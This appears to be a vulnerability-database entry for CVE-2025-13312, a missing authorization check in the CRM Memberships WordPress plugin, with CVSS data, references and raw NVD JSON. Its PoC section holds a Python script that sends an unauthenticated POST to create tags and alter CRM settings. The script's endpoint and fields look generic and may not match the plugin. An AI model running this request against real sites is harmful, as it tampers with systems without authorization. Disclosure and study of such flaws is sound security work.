CVE-2025-13312

Description

The CRM Memberships plugin for WordPress is vulnerable to unauthorized membership tag creation due to a missing capability check on the 'ntzcrm_add_new_tag' function in all versions up to, and including, 2.5. This makes it possible for unauthenticated attackers to create arbitrary membership tags and modify CRM configuration that should be restricted to administrators.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

CRM Memberships plugin for WordPress <= 2.5

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import json

target_url = "http://target-wordpress-site.com/"
api_endpoint = f"{target_url}wp-json/crm-memberships/v1/tag"

payload = {
    "tag_name": "MaliciousTag",
    "tag_description": "Unauthorized tag created via CVE-2025-13312",
    "crm_config": {
        "setting": "modified_value"
    }
}

headers = {
    "Content-Type": "application/json",
    "User-Agent": "Mozilla/5.0"
}

response = requests.post(api_endpoint, json=payload, headers=headers)

print(f"Status Code: {response.status_code}")
print(f"Response: {response.text}")

if response.status_code == 200 or response.status_code == 201:
    print("[+] Exploit successful - Tag created without authentication")
else:
    print("[-] Exploit failed or target may be patched")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13312
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13312
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13312/
[4] VulDB https://vuldb.com/cve/CVE-2025-13312
[5] https://plugins.trac.wordpress.org/browser/crm-memberships/tags/2.5/includes/class/class-ntzcrm-api.php#L14
[6] https://plugins.trac.wordpress.org/browser/crm-memberships/tags/2.5/includes/class/class-ntzcrm-api.php#L828
[7] https://www.wordfence.com/threat-intel/vulnerabilities/id/f61b9de5-5c37-4efb-ad1c-006e9fc05bc2?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13312", "sourceIdentifier": "[email protected]", "published": "2025-12-05T05:16:57.560", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The CRM Memberships plugin for WordPress is vulnerable to unauthorized membership tag creation due to a missing capability check on the 'ntzcrm_add_new_tag' function in all versions up to, and including, 2.5. This makes it possible for unauthenticated attackers to create arbitrary membership tags and modify CRM configuration that should be restricted to administrators."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/crm-memberships/tags/2.5/includes/class/class-ntzcrm-api.php#L14", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/crm-memberships/tags/2.5/includes/class/class-ntzcrm-api.php#L828", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f61b9de5-5c37-4efb-ad1c-006e9fc05bc2?source=cve", "source": "[email protected]"}]}}